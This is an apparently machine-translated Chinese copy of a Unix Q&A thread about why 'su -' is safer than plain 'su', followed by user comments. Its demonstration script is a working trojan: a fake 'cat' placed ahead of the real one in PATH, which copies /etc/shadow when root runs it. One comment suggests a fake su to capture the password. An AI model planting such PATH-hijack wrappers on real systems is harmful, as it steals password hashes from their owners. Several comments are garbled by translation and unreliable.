为什么我们使用su-而不仅仅是su？

$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"

$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!

$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit

评论

---

su-与su相同。

– Mikel
2011年2月7日在20:08

---

-是一个标志，大多数程序将其解释为“在此之后什么都不应视为标志”。用来处理以破折号开头的内容。

–大卫·麦金托什（David Mackintosh）
2011年2月9日下午4:43

---

不要忘记将umask设置为000，否则它将不起作用。

– Lekensteyn
11-10-22在8:48

---

最好只是将su文件放在PATH中。模仿真实su的行为并不难。无论如何，超级用户一直很粗心:-)

–StéphaneGimenez
2012年2月28日在18:53

---

su-与su-不同：-告诉getopt（s）（或类似的）选项处理程序停止处理命令行以获取其他选项（例如，如果其余部分包含可以以'-开头的文件名，则用'）。即，在“ rm -i--f”中：-f然后被视为常规参数，因此这里是rm -i的文件名，而不是rm命令的附加-foption。所以su-只是su而不是su-！因此，su-对于wag的（有趣而有启发性的）示例givan来说是不安全的。使用su-。

–奥利维尔·杜拉克（Olivier Dulac）
2012年12月26日15:05

---

评论

---

当我“ su”时，我得到〜和$ HOME都评估为/ root。您描述的行为是特定于某些Shell或OS版本还是某些东西？我的理解是〜可以被内核扩展。我有zsh作为我的（和root的）shell。

–JasonWoof
2011年2月8日，0：05

---

您的.bashrc或/ etc / bashrc或/etc/profile.d脚本正在设置PATH。寻找[$ UID -eq 0]或类似的东西。

– Mikel
2011年2月8日，1：14

---

例如，$ USER保持不变。

–彼得
2014年1月30日，11：13

---

sudo su呢？

–西蒙·匡（Simon Kuang）
2014年7月18日在20:10

---

您的示例对我不起作用。我得到以任何一种方式解析的相同目录。

–丹尼尔·W。
16年4月18日在14:45

---

评论

---

或/或任何定义为根目录的主目录

– Jeff Schaller♦
18年6月7日在23:42

---